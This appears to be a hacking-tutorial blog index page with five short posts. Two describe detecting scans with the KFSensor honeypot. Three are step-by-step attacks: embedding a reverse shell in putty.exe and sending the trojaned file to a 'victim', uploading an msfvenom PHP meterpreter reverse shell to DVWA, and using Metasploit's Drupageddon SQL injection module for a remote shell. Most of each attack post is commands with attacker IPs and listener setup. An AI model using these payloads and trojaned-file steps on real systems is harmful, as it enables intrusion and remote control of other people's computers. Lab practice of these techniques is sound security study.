Hack Remote Windows 10 PC using Cypher (Adding Shellcode to PE files)

at 10:51 AM Monday, May 23, 2016 0 comments
First clone cypher repository from github, to do so type:


git clone https://github.com/xan7r/cypher.git


Now choose an executable file and copy to cypher folder to bind the cypher with any .exe file

Here in my case I have copied putty.exe as a file to bind with cipher

Note: only executable file can be binded.


Now run the following command

python addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 -p 0


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Start metasploit using msfconsole


use exploit/multi/handler
set payload windows/shell_reverse_tcp
set lhost 192.168.0.105
set lport 4444
exploit

Now send the binded putty_evil .exe to the victim, as soon as he opens the file a shell session will open

Labels: ,

Detect Vulnerability Scanner in Network using Kfsensor

at 9:12 AM 0 comments
In the previous article, we have seen that how KFSensorHoneypot IDS detects any unauthorized person by simulating vulnerable system services. Well, vulnerability to a hacker is like jewels. Every hacker or malicious person  fist face of hacking is Footprinting and second is scanning where they get to know whether a system is vulnerable for performing an attack or not. So in this article, we will detect an unauthorized person or a hacker and stop it.

Install and start KFSensorHoneypot IDS server to do this read my previous article
http://www.hackingarticles.in/detect-hacker-network-using-kfsensor-honeypot

Here my KFSensorHoneypot is ready.


Scanning phase tells us whether systems is vulnerable or not and sometimes even provide us exploit information which is available for that vulnerability. So every of the hacker performs this step before exploiting your system.
 So here I try to scan my system running KFSensor with Nessus vulnerability scanner from another computer.


As you can see Nessus started scanning my system and finding the vulnerability.


Here you can see that KFSensorHoneypot IDS alerted you that someone is trying to scan your system for vulnerability and some of the packets your system is receiving are malicious and recorded attackers IP address.


Now I’m trying to scan my system with GFI Languard also to see that KFSensorIDS detect or not.


GFI Languard started scanning.


Here KFSensorHoneypot IDS alerted that someone is sending packets to get vulnerability of the system. Here you can monitor attacks on every TCP and UDP ports. Even you can see ICMP or ping messages.


Here you can see that someone is trying attacking on Port and his IP address is 192.168.149.1


You can also view alerts by visitor’s means which IP address is trying to access onwhich ports.



KfsensorHoneypot IDS can also detect whether someone is using a Vulnerability scanner or not to perform an attack on your system. Now we know that particular IP address is sending to many packets which are not good. So to block that IP address we have to create a separate policy for that visitor.
To do that double-click on IP address you want to block accessing your system, a menu will appear.


Now click on details.




Here click on Create Visitor Ruleto create a policy.
After that select port, you want to block for that IP address and select actions Close or Ignore all requests from that particular IP address.

Labels: ,

Web Server Penetration with DVWA and Metasploit (Beginner Guide)

at 10:05 AM Sunday, May 22, 2016 0 comments
Open your kali linux terminal and type

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.140 lport=4444 -f raw


It will generate a raw code of php file


Now copy the generated code in the text file and save it on your desktop with .php extension


Now open the DVWA Webapp in your server and login with following credentials:
Username - admin
Password - password


Now scroll to the File Upload section in left pane and upload the above created php file


When you will finish uploading your php file, it will show you the path


Now open your uploaded file in browser


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.140
set lport 4444
exploit

Now you can access the victim's server

Labels: ,

Detect Hacker in Network using kfsensor Honeypot

at 9:53 AM Thursday, May 19, 2016 0 comments
KFSensor is windows based Honeypot IDS (Intrusion Detection System), which acts as a honeypot to attract and detect hackers or other unauthorized users and Trojans by creating a virtual vulnerable system and services. By acting as a lure server or system it can divert all attacks and unauthorized visiting from a crucial and critical system. KFSensor is designed to use in windows based corporate level company and provides a cost effective way to improve network level security.
Let’s see how it works and protects.

You can download KFSensor from their official website or follow this link http://goo.gl/YrFmkb
So here I installed KFSensor on my system when you open KFSensor for the first time on you system you have to configure so, let’s do it.

Click Next

Now here you have to select your native services to monitor. Well, these services are running by default by the system

If you want notification related to attacks directly in your email account then give you email details here in this section to receive KFSensor email alerts.


Now finally click on finish to start monitoring your network.


This is the main interface of KFSensor where you can see each and every visit with deep details. You can view visitors by ports as well as by IP address.



So now if an intruder tries to scan or attack your system KFSensor will show them a simulated vulnerable machine and records their IP address, protocols, type of attack or scan they are performing, etc.
For example, here I’m scanning windows IP address running KFSensor with Nmap from my Linux system. You can see that Nmap results show me lots of services running on windows system which can be usedt o perform an attack.


When I was performingNmap scan KFSensor capture and record my IP address. You can see someone visited port 21 which is used for file transfer and visitor name is pc2-pc.rajlab.com

Labels:

Hack Drupal Website Server using Drupal HTTP Parameter Key/Value SQL Injection

at 7:40 AM Monday, May 9, 2016 0 comments
This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).

Exploit Targets
Drupal 7.0

Requirement
Attacker: kali Linux
Victim PC: Drupal 7.0


Open Kali terminal type msfconsole


Now type use exploit/multi/http/drupal_drupageddon
msf exploit (drupal_drupageddon)>set targeturi /drupal/
msf exploit (drupal_drupageddon)>set rhost 192.168.0.109 (IP of Remote Host)
msf exploit (drupal_drupageddon)>set rport 80
msf exploit (drupal_drupageddon)>exploit         
   
Labels: ,
Subscribe to: Comments (Atom)